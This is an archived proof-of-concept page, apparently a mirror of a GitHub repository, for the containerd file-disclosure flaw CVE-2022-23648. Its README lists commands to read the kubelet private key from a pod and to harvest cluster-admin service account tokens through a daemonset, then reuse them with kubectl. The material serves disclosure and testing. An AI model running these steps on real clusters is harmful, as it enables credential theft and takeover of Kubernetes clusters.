Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-23648 PoC — containerd 信息泄露漏洞

Source
https://github.com/raesene/CVE-2022-23648-POC
Associated Vulnerability
Title:containerd 信息泄露漏洞 (CVE-2022-23648)
Description:containerd是美国阿帕奇(Apache)基金会的一个容器守护进程。该进程根据 RunC OCI 规范负责控制宿主机上容器的完整周期。 containerd 1.6.1之前版本, 1.5.10之前版本, 和1.14.12之前版本存在信息泄露漏洞,攻击者可利用该漏洞通过特殊的镜像配置启动容器并访问主机上任意文件和目录的只读副本。这可能绕过任何基于策略的容器设置实施(包括Kubernetes Pod安全策略),并暴露潜在的敏感信息。
Description
POC for CVE-2022-23648
Readme
## PoC for CVE-2022-23648

This is a proof of concept for [@_fel1x](https://twitter.com/_fel1x)'s CVE-2022-23648. Disclosure info [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=2244), CVE info [here](https://github.com/containerd/containerd/security/advisories/GHSA-crp2-qrr5-8pq7) and a blog with some more information and mitigation ideas [here](https://blog.aquasec.com/cve-2022-23648-containerd-cri-plugin). The `Containerfile` has the info. needed, and you can change the target of the VOLUME to try out different paths.

Easiest way to show it working is to use [KinD](https://kind.sigs.k8s.io/docs/user/quick-start/) which has exploitable images.

## Basic Test procedure

Unless the node somehow has a lot of data in `/var/lib/kubelet/pki`, this should be a safe test.

- `kind create cluster --image=kindest/node:v1.21.1`
- `kubectl create -f pod-manifest.yaml`
- `kubectl exec poctest -- ls /var/lib/kubelet/pki/`

And if you get back files including `kubelet.key` it worked :)

## Try to escalate to cluster-admin

NOTE: **Do not attempt this on a production cluster.  A vulnerable Containerd may duplicate a lot of data into this attack pod and exhaust disk space. Also, this will print cluster-admin SA tokens to pod logs which are likely to get sent to a logging destination in plaintext**

This will run a daemonset that attempts to enumerate all Kubernetes service account tokens on the node and print it to the pod's logs if it's found to be a `cluster-admin` token.

- `kubectl apply -f ds.yaml`
- `kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i '*' '*' -A`

If `yes` is printed, congrats, you have a short-lived `cluster-admin` service account token, run: 

- `kubectl logs -l app=poctest | head -1 | awk -F\. '{print $2}' | base64 -d` to see which SA it is

- `kubectl --token="$(kubectl logs -l app=poctest | head -1)" get pods -A`
- `kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i --list`

## Author

- [Rory McCune @raesene](https://twitter.com/raesene)

## Contributors

- [@BradGeesaman](https://twitter.com/bradgeesaman) - Escalation Daemonset
File Snapshot

 [4.0K]  /data/pocs/8360b0a14fbec8e9c8ab520e4f326cc5356886b4
├── [ 117]  Containerfile
├── [1.2K]  ds.yaml
├── [ 233]  pod-manifest.yaml
└── [2.1K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.